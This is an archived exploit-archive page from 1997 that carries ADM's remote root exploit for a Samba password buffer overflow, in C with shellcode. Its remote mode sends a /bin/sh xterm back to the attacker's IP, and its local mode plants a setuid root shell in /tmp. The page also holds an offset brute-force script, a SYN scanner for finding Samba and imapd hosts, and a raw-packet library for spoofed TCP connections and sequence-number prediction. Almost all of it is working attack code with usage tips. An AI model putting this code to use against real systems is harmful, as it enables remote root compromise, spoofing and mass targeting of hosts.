Samba Remote buffer overflow
| Description: | Samba reads in a user's password into a fixed length buffer, allowing execution of arbitrary code on the target machine |
| Author: | ADM |
| Compromise: | root (remote) |
| Vulnerable Systems: | Those running the SAMBA SMB server versions earlier than 1.9.17p2. The exploit is for Linux/X86 |
| Date: | 26 September 1997 |
| Notes: | ADM send me this before it went out on Bugtraq, and then they sent me a newer version (appended). Thanks! |
Date: Fri, 26 Sep 1997 22:08:29 +0200
From: root <root@ADM.kix-azz.org>
To: fyodor@nmap.org
[ Message Cut ]
/* ___ ______ _ _
/ \ | _ \ | \ / |
| / \ | | | \ | | \_/ |
| |___| | | |_ / | | \_/ |
| --- | | / | | | |
''' ''' ''''''' '''' ''''
ADMkillsamba ver 0.2 argh ADM back again ! :)))
whats new ?: i have include a krad help & a verry Fast utility for found
smbserver <note: u can use it for found imapd :)> ; a script shell for make
brutal buff/offset for the sploit heh a lot of surprise < hahah supeer:)
the buffer have a better structure <4 a better world ??> & option for local
sploit :) cya ppl
admsmb@hotmail.com <note: is only for smbd sploit ! ADM have no email etc */
/* ADMkillsamba-v0.2.c */
#define DEFAULT_OFFSET 3500
#define DEFAULT_BUFFER_SIZE 3081
#define NOP 0x90
#include <stdio.h>
#include <strings.h>
#include <stdlib.h>
unsigned char shellcode[500] =
"\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
"\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
"\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
"\x80\xe8\xcc\xff\xff\xff";
unsigned char localshell[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/IK";
void main(int argc, char *argv[]) {
FILE *filez;
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
char netbios_name[100];
char bufferz[255];
char ipz[40];
char myipz[40];
unsigned char bla[50] = "\xfe\xe8\xb1\xff\xff\xff";
int *ret;
unsigned char cmd[50]="/usr/X11R6/bin/xterm\xff-display\xff";
unsigned char arg1[50];
int i;
bzero(netbios_name,100);
bzero(bufferz,255);
bzero(ipz,40);
bzero(ipz,40);
if(argc <3){
printf(" usage Remote: ADMkillsamba R <ip of the victim> <netbios name> <your ip> [buff size] [offset size]\n");
printf("<ip of victim> = 11.11.11.11 ! THe numerical IP Only ! not www.xxx.cc !\n");
printf("<netbios name> = VICTIME for get the netbios name use ADMnmbname or ADMhack\n");
printf("<your ip> = the sploit send a xterm to your machine heh \n");
printf("option:\n");
printf("[buff size] = the size of the buffer to send default is 3081 try +1 -1 to a plage of +10 -10\n");
printf("[offset size] = the size of the offset default is 3500 try +50 -50 to a plage of 1000 -1000\n");
printf("usage Local: ADMkillsamba L <netbios name> [buffer size] [offset size]\n");
printf(" HaVe Fun\n");
exit(0);
}
if(*(argv[1]+0)=='R'){
printf("Remote sploit\n");
sprintf(arg1,"%s:0\xff-e\xff/bin/sh\xff",argv[4]);
shellcode[4] =(unsigned char)0x32+strlen(cmd)+strlen(arg1);
bla[2] =(unsigned char) 0xc9-strlen(cmd)-strlen(arg1);
if (argc > 5) bsize = atoi(argv[5]);
if (argc > 6) offset = atoi(argv[6]);
strcat(shellcode,cmd);
strcat(shellcode,arg1);
strcat(shellcode,bla);
strcat(shellcode,"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx");
strcpy(ipz,argv[2]); /* haha u can overflow my sploit :) */
strcpy(netbios_name,argv[3]);
}
if(*(argv[1]+0)=='L'){
printf("Local sploit\n");
strcpy(shellcode,localshell);
strcpy(netbios_name,argv[2]);
strcpy(ipz,"127.0.0.1");
filez=fopen("/tmp/IK","w+");
fprintf(filez,"#!/bin/sh\n");
fprintf(filez,"cp /bin/sh /tmp/.sh-r00t\n");
fprintf(filez,"chmod 4777 /tmp/.sh-r00t\n");
fflush(filez);
fclose(filez);
system("chmod a+x /tmp/IK");
}
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
sprintf(bufferz,"\\\\\\\\%s\\\\IPC$",netbios_name);
addr = 0xbffffff0 - offset ;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
execl("./smbclient","smbclient",bufferz,buff,"-I",ipz,NULL);
}
--------------------------------small help------------------------------------
ADMsmb HELP v0.1
( a krad help =) )
Q: why the sploit gimme alwais the msg Broken pipe ???
A: ok diz msg appear when you have not the good buffer_size/offset value
yes diz param change on every machine ! u must found it! for that try
a brutal force on the buff/offset see the script :)
-------------------------------Brutal Force-----------------------------------
#!/bin/sh
declare -i D
declare -i OFF
declare -i try
declare -i BUFF
BUFF=3081 # buffer size
while true
do
D=1000 # offset
while test "$D" -lt 8000
do
./ADMkillsamba <ip of the victim> <netbios name of the vic> <your iP> $BUFF $D
echo
echo $D
echo $BUFF
echo
D=D+25
done
BUFF=BUFF+1
done
---------------------------------------------------------------------------------
Q: what is the best param for buff/offst .?
A: first try with diz param buffer=3081 offset=3500 if is dont work try
to change the offset size 1000 at 8000 if he dont run try buff size 3075
at 3090 i know its hard but with experience its simple =)
Q: how to found the buff size ??
A: simple ! launch ADMkillsamba with buff/size=1000 if the srv dont make
a broken pipe the buffer was to small try by step of 100 when the srv
give u a broken pipe ; try to see the precise value ! and make a scan on
it =)
ex: buff = 3000 no broken pipe
buff = 3100 broken pipe
buff = 3050 no broken pipe
buff = 3070 broken pipe < scan to 3070 at 3100
Q: the offset size ??
A: Scan it :)
PS: if u found a offset & buff/size on a system plz send it i'am gonna make
a list of the most curently buff/size
PPS: if u wanna code a char shell for a other OS mail me !
news: ADM gonna make a home page for diz sploit dont forget to see it for
more helps tips/etc
cya
--------------------------------------------------------------------------------
the utility for search smbserver [ u can use it for imapd =) ]
/*******************************************************************/
/* ADM imap/smb scanner the BEST of §THE WORLD ! =] by DA ADM crew */
/* he needs the output of a host -l target >filez for run */
/* USAGE is SIMPLE ! ADMimap <host filz> <your ipZ> <delay> */
/*******************************************************************/
/* VERSION: 1.2 */
/* CoDeuRz: a CoDeuRz of ADM */
/* Greeeetzzzzzz: ADM & HeiKe & some guyz on ***.*******.*** */
/*******************************************************************/
#include <stdio.h>
#include <signal.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/in.h>
#include "ADM-spoof.c"
host2ip(char *serv)
{
struct sockaddr_in sinn;
struct hostent *hent;
hent=gethostbyname(serv);
if(hent == NULL) return 0;
bzero((char *)&sinn, sizeof(sinn));
bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length);
return sinn.sin_addr.s_addr;
}
int raw_send,raw_tcp;
main(int argc, char **argv)
{
struct sockaddr_in recv_dst;
unsigned long da_ip;
char buffer[4096],reply[256];
char buffer2[20];
char sern[20];
int on=1,off=0,verbose=1,goout=0,goin=0,timez2=0,autotime=0,regular=10;
int i=0,j,resu,n,len,auto3,timez=8,max_try=2;
FILE *log;
FILE *IPSRC;
FILE *HOSTF;
pid_t pid;
int portz;
unsigned long int nip;
struct iphdr *ip=(struct iphdr*)buffer;
struct tcphdr *tcp=(struct tcphdr*)(buffer+IPHDRSIZE);
HOSTF=fopen(argv[2],"r");
IPSRC=fopen("IPSRC","w+");
IPFILEZ(HOSTF,IPSRC);
fclose(HOSTF);
rewind(IPSRC);
printf("ADMfindall ver 1.2 (c) ADM\n");
if(argc<4){
printf("\nusage: ADMimap <yourIP> <IP file> <delay> [ S-I ]\n");
printf("\n<yourIP> = ADMimap needs your IP for make the scan\nbut u can scan with www.nasa.gov if u want ;))\n");
printf("<IP file> = the filez of ip u want scan\ntry a :# host -l nasa.gov > ipfilez for scan ALL nasa.gov\n");
printf("<delay> = define the delay in second for waiting the ACK type 0 for auto\n");
printf("[S-I] = S == scan 4 Samba I == scan 4 imapd\n");
exit(0);
}
if(*(argv[4]+0)=='S')
{
portz=139;
strcpy(sern,"Samba");
}
else
{
portz=143;
strcpy(sern,"Imapd");
}
log=fopen("ADMFIND.LOG","w");
if (log==NULL) {
perror("fopen");
exit(1);
}
raw_send=socket(AF_INET, SOCK_RAW, 255);
if(raw_send == -1) {
printf("cant open raw socket for sending\n");
exit(1);
}
raw_tcp=socket(AF_INET ,SOCK_RAW ,6);
if (raw_tcp == -1) {
printf("can't open raw socket for receiving\n");
exit(1);
}
ioctl(raw_tcp,FIONBIO,&on);
if(timez2=atoi(argv[3]) == 0)
{
auto3 = 1;
printf(" AUTO ON ! \n");
}
else{timez2=atoi(argv[3])*50;}
for(;;){
if(!feof(IPSRC)){
fscanf(IPSRC,"%s",buffer2);
printf(" sendto %s\n",buffer2);
autotime++;
send_pkt(raw_send,host2ip(argv[1]),host2ip(buffer2),
2666,portz,TH_SYN,111,111,0,NULL,0);
}
if(feof(IPSRC))goout=3;
if(goout>1){
usleep(1);
goin++;
}
if(auto3==1){
if(goin > autotime*regular )
{
fclose(log);
exit (0);
}
}
else{
if(goin > timez2){
fclose(log);
exit(0);}
}
buffer[0]='0';
get_pkt(raw_tcp,buffer,400);
if(buffer[0]!='0'){
if(tcp->th_dport == htons(2666)){
if(tcp->th_sport == htons(portz)){
resu= (tcp->th_flags | TH_ACK) ;
if(resu==18)
{
fprintf(log,"%s on %s\n",sern,inet_ntoa(ip->saddr));
printf("%s on %s\n",sern,inet_ntoa(ip->saddr));
fflush(log);
}
}
}
}
}
printf(" ALL IP WAS LOGED on ADMFIND.LOG !\n");
fclose(log);
}
-------------------------------[ADM-spoof.c]----------------------------------
u need diz include for ADMfindall.c
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
/************************************************************************/
/* ADM spoofing include ver 1.4 */
/************************************************************************/
/* READ THE ADM-spoof.what.news for more info ! */
/************************************************************************/
/************************************************************************/
/* EnJoY AdM SOurceZzzzZzz */
/************************************************************************/
/* hey hotlame & co dont read diz src u are so l33t for this MOUHAHAHAHA*/
/************************************************************************/
#define IPHDRSIZE sizeof(struct iphdr )
#define ICMPHDRSIZE sizeof(struct icmphdr)
#define TCPHDRSIZE sizeof(struct tcphdr )
#define PSEUDOHDRSIZE sizeof(struct pseudohdr)
#define UDPHDRSIZE sizeof(struct udphdr)
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/ip_tcp.h>
#include <netinet/udp.h>
/*****************************************************************************/
/* structure of the pseudo header */
/*****************************************************************************/
struct pseudohdr{
unsigned long saddr;
unsigned long daddr;
char useless;
unsigned char protocol;
unsigned int leng;
};
struct nnn{
u_long ip;
}myip;
struct s_hdr{
__u32 s_ack:32;
__u32 s_seq:32;
__u32 s_da_ip:32;
__u32 s_ip:32;
__u16 s_sport:16;
__u16 s_dport:16;
}spoof_hdr;
#ifdef SYSV
#define bcopy(s1,s2,len) memcpy(s2,s1,len)
#endif
/*****************************************************************************/
/*
* in_cksum --
* Checksum routine for Internet Protocol family headers (C Version)
* pinched from the a rfc ( cheksum calcul )
*/
/*****************************************************************************/
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}
/****************************************************************************/
/* SEND A PAKET TCP ! */
/*
usage: send_pkt(socket , ip of source , ip of dest , source port, dest port,
flags, seq_num, ack_num, window size , *data , size of data);
*/
/****************************************************************************/
send_pkt(int s,
unsigned long s_ip,
unsigned long d_ip,
unsigned int s_port,
unsigned int d_port,
unsigned char flags,
unsigned long seq_num,
unsigned long ack_num,
unsigned int winsize,
unsigned char *data,
unsigned int data_size
)
{
struct sockaddr_in sin_dst;
struct iphdr *ip;
struct tcphdr *tcp;
struct pseudohdr *pseudo;
unsigned char *DATA;
unsigned char packet[2048];
ip = (struct iphdr *)packet;
pseudo = ( struct pseudohdr *)(packet+IPHDRSIZE-PSEUDOHDRSIZE);
tcp = (struct tcphdr *)(packet+IPHDRSIZE);
DATA = (unsigned char *)(packet+IPHDRSIZE+TCPHDRSIZE);
memset(packet,0,2048);
memcpy(DATA,data,data_size);
pseudo->saddr = s_ip;
pseudo->daddr = d_ip;
pseudo->useless = 0;
pseudo->protocol = 6;
pseudo->leng = htons(TCPHDRSIZE+data_size);
tcp->th_sport=htons(s_port);
tcp->th_seq=htonl(seq_num);
tcp->th_ack=htonl(ack_num);
tcp->th_off=5;
tcp->th_flags=flags;
tcp->th_win=htons(winsize);
tcp->th_urp=0;
tcp->th_dport=htons(d_port );
tcp->th_sum=0;
tcp->th_sum=in_cksum(pseudo,TCPHDRSIZE+PSEUDOHDRSIZE+data_size);
memset(packet,0,IPHDRSIZE);
ip->saddr = s_ip;
ip->daddr = d_ip;
ip->version = 4;
ip->ihl = 5;
ip->ttl = 245;
ip->protocol = 6;
ip->tot_len = htons(IPHDRSIZE+TCPHDRSIZE+data_size);
ip->tos = 0;
ip->id = random()%1256;
ip->frag_off = 0;
ip->check = in_cksum(packet,IPHDRSIZE);
sin_dst.sin_addr.s_addr = ip->daddr;
sin_dst.sin_family = AF_INET;
sendto(s,packet,IPHDRSIZE+TCPHDRSIZE+data_size,0,
(struct sockaddr *)&sin_dst,sizeof(struct sockaddr));
}
/*****************************************************************************/
/* SEND A UDP PACKET */
/* usage: udp_send( socket, addr of source , addr of dest, port source , */
/* port of dest, *data , size of data); */
/*****************************************************************************/
int udp_send(int s,
unsigned long s_addr,
unsigned long d_addr,
unsigned short s_port,
unsigned short d_port,
char *datagram,
unsigned datasize)
{
struct sockaddr_in sin;
struct iphdr *ip;
struct pseudohdr *pseudo;
struct udphdr *udp;
unsigned char *data;
unsigned char packet[1024];
ip = (struct iphdr *)packet;
pseudo = (struct pseudohdr *)(packet+IPHDRSIZE-PSEUDOHDRSIZE);
udp = (struct udphdr *)(packet+IPHDRSIZE);
data = (unsigned char *)(packet+IPHDRSIZE+UDPHDRSIZE);
memset(packet,0,1024);
pseudo->saddr=s_addr;
pseudo->daddr=d_addr;
pseudo->useless=0;
pseudo->protocol=17;
pseudo->leng=htons(UDPHDRSIZE+datasize);
udp->source = htons(s_port);
udp->dest = htons(d_port);
udp->len = htons(UDPHDRSIZE+datasize);
memcpy(data,datagram,datasize);
udp->check = 0;
udp->check = in_cksum(pseudo+PSEUDOHDRSIZE+UDPHDRSIZE+datasize);
memcpy(data,datagram,datasize);
memset(packet,0,IPHDRSIZE);
ip->saddr = s_addr;
ip->daddr = d_addr;
ip->version = 4;
ip->ihl = 5;
ip->ttl = 255;
ip->id = random()%5985;
ip->protocol = 17;
ip->tot_len = htons(IPHDRSIZE + UDPHDRSIZE+ datasize);
ip->check = 0;
ip->check = in_cksum((char *)packet,IPHDRSIZE);
sin.sin_family=AF_INET;
sin.sin_addr.s_addr=d_addr;
sin.sin_port=udp->dest;
return sendto(s, packet, IPHDRSIZE+UDPHDRSIZE+datasize, 0,
(struct sockaddr*)&sin, sizeof(struct sockaddr));
}
/****************************************************************************/
/* SEND A ICMP PACKET */
/* hehe ripped from ADMscan2 :) */
/****************************************************************************/
/* IN TEST !!!!!!!
int icmp_echo(int s,unsigned long int src, unsigned long int dest,int id,int seq,
char* data, unsigned int datasize)
{
struct iphdr *ip;
struct icmphdr *icmp;
unsigned char *icmpdata;
unsigned char *packet;
struct sockaddr_in sin_dst;
int n;
packet=(char*)malloc(IPHDRSIZE +ICMPHDRSIZE+datasize+1);
if (packet==NULL) {
puts("malloc error");
return -1;
}
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *)(packet+IPHDRSIZE);
icmpdata = (char *)(packet+IPHDRSIZE+ICMPHDRSIZE);
ip->saddr = src;
ip->daddr = dest;
ip->version = 4;
ip->ihl = 5;
ip->ttl = 255;
ip->protocol = 1;
ip->tot_len = htons(IPHDRSIZE +ICMPHDRSIZE+datasize);
ip->tos = 0;
ip->id = 0;
ip->frag_off = 0;
ip->check = 0;
ip->check = in_cksum(ip,IPHDRSIZE);
icmp->type = 8;
icmp->code = 0;
icmp->checksum = 0;
icmp->un.echo.id = id;
icmp->un.echo.sequence = seq;
memcpy(icmpdata,data,datasize);
icmp->checksum = in_cksum(icmp,ICMPHDRSIZE+datasize);
sin_dst.sin_addr.s_addr = ip->daddr;
sin_dst.sin_family = AF_INET;
n=sendto(s,packet,IPHDRSIZE+ICMPHDRSIZE+datasize,0,
(struct sockaddr*)&sin_dst,sizeof(struct sockaddr));
if (n==-1) puts("sendto error");
free(packet);
}
*/
/****************************************************************************/
/* TEST IF A HOST IS ALIVE */
/* */
/****************************************************************************/
/*****************************************************************************/
/* RECV PAKET */
/* get_pkt(socket, *buffer , size of the buffer); */
/*****************************************************************************/
get_pkt(int s,unsigned char *data,int size)
{
struct sockaddr_in sin;
int len,resu;
len= sizeof(sin);
resu=recvfrom(s,data,size,0,(struct sockaddr *)&sin,&len);
return resu;
}
/*****************************************************************************/
/* GET THE SEQ NUMBER */
/*****************************************************************************/
unsigned long get_seq(unsigned long s_ip, unsigned long d_ip,unsigned int s_port)
{
struct sockaddr_in sin;
struct tcphdr *tcp;
struct iphdr *ip;
unsigned char data[400];
int s,i,s_r,S_port,timeout=0,on=1;
unsigned long ack_num=0;
ip = (struct iphdr *)data;
tcp = (struct tcphdr *)(data+IPHDRSIZE);
memset(data,0,399);
S_port = random()%1000;
s=socket(AF_INET,SOCK_RAW,255);
s_r=socket(AF_INET,SOCK_RAW,6);
ioctl(s_r,FIONBIO,&on);
ioctl(s,FIONBIO,&on);
#ifdef IP_HDRINCL
setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&i, sizeof(i));
#endif
send_pkt(s,s_ip,d_ip,S_port,s_port,TH_SYN,1234,0,512,NULL,0);
while(timeout<280){
get_pkt(s_r,data,398);
if(ip->saddr==d_ip){
if(tcp->th_dport == htons(S_port) ){
if(tcp->th_sport == htons(s_port)){
if(tcp->th_flags & TH_ACK)
{
printf(" SeQ numa Is %lu \n" , ntohl(tcp->th_seq));
ack_num=ntohl(tcp->th_seq);
break;
}
}
}
}
usleep(10000);
timeout++;
}
close(s);
close(s_r);
return ack_num;
}
/*****************************************************************************/
/* PORT PROBER */
/* usage: pprobe(ip of desti , port ,flagz ) */
/*****************************************************************************/
pprobe(unsigned long da_ip,
unsigned short int port,
int flagz )
{
struct sockaddr_in sin;
struct tcphdr *tcp;
struct iphdr *ip,*ipr;
unsigned char data[400];
unsigned char datar[400];
int s,i=1,s_r,resu,timeout=0,sicmp,on=1;
ip = (struct iphdr *)data;
tcp = (struct tcphdr *)(data+IPHDRSIZE);
ipr = (struct iphdr *)data;
memset(data,0,399);
s=socket(AF_INET,SOCK_RAW,255);
s_r=socket(AF_INET,SOCK_RAW,6);
sicmp=socket(AF_INET,SOCK_RAW,1);
ioctl(s_r,FIONBIO,&on);
ioctl(sicmp,FIONBIO,&on);
#ifdef IP_HDRINCL
setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&i, sizeof(i));
#endif
send_pkt(s,myip.ip,da_ip,2669,port,flagz,1234,0,512,NULL,0);
resu = -1;
while(timeout<80){
data[0]='0';
datar[0]='0';
usleep(100000);
timeout = timeout + 1;
get_pkt(s_r,data,399);
get_pkt(sicmp,datar,399);
if(datar[0]!='0')
{
resu = -1;
printf("ICMP!\n");
goto fin;
}
if(data[0]!='0'){
if(ip->saddr==da_ip){
if(tcp->th_dport == htons(2669) ){
if(tcp->th_sport == htons(port)){
resu= (tcp->th_flags | TH_ACK) ;
if(resu==18)resu = 0;
if(resu==20)resu = -1;
break;
}
}
}
}
}
fin:
if(timeout > 79) printf(" Time Out");
close(s);
close(s_r);
close(sicmp);
return resu ;
}
/****************************************************************************/
/* UDP PORT PROBBER */
/* usage: Upprobe( ip of dest , port) */
/****************************************************************************/
/* bha dont work fine */
Upprobe(unsigned long da_ip, unsigned short int port )
{
struct sockaddr_in sin,sin_dst;
struct icmphdr *icmp;
struct iphdr *ip;
unsigned char data[400];
int s,i=1,s_r,resu;
ip = (struct iphdr *)data;
icmp = (struct icmphdr*)(data+IPHDRSIZE);
memset(data,0,399);
s=socket(AF_INET,SOCK_DGRAM,17);
ioctl(s,FIONBIO,&i);
sin_dst.sin_family=AF_INET;
sin_dst.sin_port=htons(port);
sin_dst.sin_addr.s_addr = da_ip;
sendto(s,NULL,0,0,(struct sockaddr *)&sin_dst,sizeof(sin_dst));
s_r=socket(AF_INET,SOCK_RAW,1);
i=1;
ioctl(s_r,FIONBIO,&i);
resu=-1;
for(;;){
data[0]='0';
get_pkt(s_r,data,399);
if(data[0]!='0')
{
printf(" ???\n");
if(ip->saddr==da_ip)
{
if(ip->protocol==1)
{
resu = 0;
goto fin;
}
else
{
resu = -1;
}
}
}
}
fin:
return resu;
}
/****************************************************************************/
/* MakE A sPOoF ConnEction */
/* */
/* usage(socket,sourceIP,Destination IP ,port SOurce, port Dest,ipofurhost) */
/****************************************************************************/
Sconnect(int s,
unsigned long s_ip,
unsigned long d_ip,
unsigned short int s_port,
unsigned short int d_port,
unsigned long myhost)
{
int loop;
spoof_hdr.s_seq = 1;
spoof_hdr.s_da_ip = d_ip;
spoof_hdr.s_ip = s_ip;
spoof_hdr.s_sport = s_port;
spoof_hdr.s_dport = d_port;
spoof_hdr.s_ack = get_seq(myhost,d_ip,d_port);
send_pkt(s,s_ip,d_ip,s_port,d_port,TH_SYN,spoof_hdr.s_seq,1,512,NULL,0);
for(loop=1;loop<4;loop++)
{
spoof_hdr.s_seq=spoof_hdr.s_seq;
printf(" spoof ack +64000*%i+1 =%lu \n",loop,spoof_hdr.s_ack+(64000*loop)+1);
send_pkt(s, s_ip ,d_ip ,s_port,d_port,TH_ACK,spoof_hdr.s_seq=spoof_hdr.s_seq+1,spoof_hdr.s_ack+(64000*loop)+1,14360,NULL,0);
}
}
/*****************************************************************************/
/* Spoofed Write ( need Sconnect before ) */
/* usage: Swrite (socket, *data , sizeofdata ); */
/*****************************************************************************/
Swrite(int s, u_char *data, int size )
{
int loop;
for(loop=1;loop<4;loop++)
{
send_pkt(s,spoof_hdr.s_ip,spoof_hdr.s_da_ip ,
spoof_hdr.s_sport,spoof_hdr.s_dport,
(TH_PUSH|TH_ACK),spoof_hdr.s_seq,spoof_hdr.s_ack+(64000*loop)+1,
14360,data,size);
}
spoof_hdr.s_seq=spoof_hdr.s_seq+size;
}
/*****************************************************************************/
/* Test If a Host Is SPoofable */
/* usage: Stest (myhost,ip dest , port of dest); */
/*****************************************************************************/
/* lame test =) */
Stest( unsigned long myhost, unsigned long ip_d , unsigned short d_port)
{
u_long resu,R;
u_long resu1,R1;
u_long resu2,R2;
u_long resu3,R3;
int done = -1;
resu = get_seq(myhost,ip_d,d_port);
resu1 = get_seq(myhost,ip_d,d_port);
resu2 = get_seq(myhost,ip_d,d_port);
resu3 = get_seq(myhost,ip_d,d_port);
if(resu1-resu==64000 || resu1-resu == 128000) done=0;
if(resu3-resu2==64000|| resu3-resu2== 128000) done=0;
return done;
}
/****************************************************************************/
/* get only the IP frome a host -l ouput filez */
/* usage: IPFILEZ( *the src filez, *the output filez); */
/****************************************************************************/
IPFILEZ(FILE *DA,FILE *trace)
{
char ipz[256];
int oki;
while(!feof(DA))
{
fscanf(DA , "%s", ipz );
if(strstr(ipz,"u") == 0 )
{
if(strstr(ipz,"y") == 0)
{
if(strstr(ipz,"e") == 0)
{
if(strstr(ipz,"g") == 0)
{
if(strstr(ipz,"i") == 0)
{
if(strstr(ipz,"a") == 0)
{
if(strstr(ipz,"o") == 0)oki=1;
}
}
}
}
}
}
if(oki==1)
{
fprintf( trace , "%s\n" , ipz );
fflush(trace);
oki=0;
}
if(feof(DA))break;
}
}
/****************************************************************************/
/* make a Scan Port on a plage of port */
/* Scan2( *int input,int*output,size of *); */
/****************************************************************************/
Scan2(int *ptr,int *outptr,int Size,int flagz , u_long da_ip)
{
struct sockaddr_in sin;
struct tcphdr *tcp,*tcpr;
struct iphdr *ip,*ipr;
unsigned char data[400];
unsigned char datar[400];
int s,i=1,s_r,resu,timeout=0,try=0,on=1;
ip = (struct iphdr *)data;
tcp = (struct tcphdr *)(data+IPHDRSIZE);
ipr = (struct iphdr *)datar;
tcpr= (struct tcphdr *)(datar+IPHDRSIZE);
memset(outptr,0,(Size/2));
memset(data,0,399);
s=socket(AF_INET,SOCK_RAW,255);
s_r=socket(AF_INET,SOCK_RAW,6);
ioctl(s_r,FIONBIO,&on);
#ifdef IP_HDRINCL
setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&i, sizeof(i));
#endif
while(timeout<540){
data[0]='0';
datar[0]='0';
usleep(10000);
timeout = timeout + 1;
if(try<Size)
{
if(*(ptr+try) != 0)
{
send_pkt(s,myip.ip,da_ip,40000-try,*(ptr+try),flagz,1234,0,512,NULL,0);
}
}
get_pkt(s_r,datar,399);
if(datar!='0'){
if(ipr->saddr==da_ip){
if( ntohs(tcpr->th_dport) > 39000 ){
resu= (tcpr->th_flags | TH_ACK) ;
if(resu==18){
*(outptr+(40000-ntohs(tcpr->th_dport)))=1;
printf(" the Port %i is open :)\n",ntohs(tcpr->th_sport));
resu=0;
datar[0]='0';
}
}
}
}
try++;
}
}
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
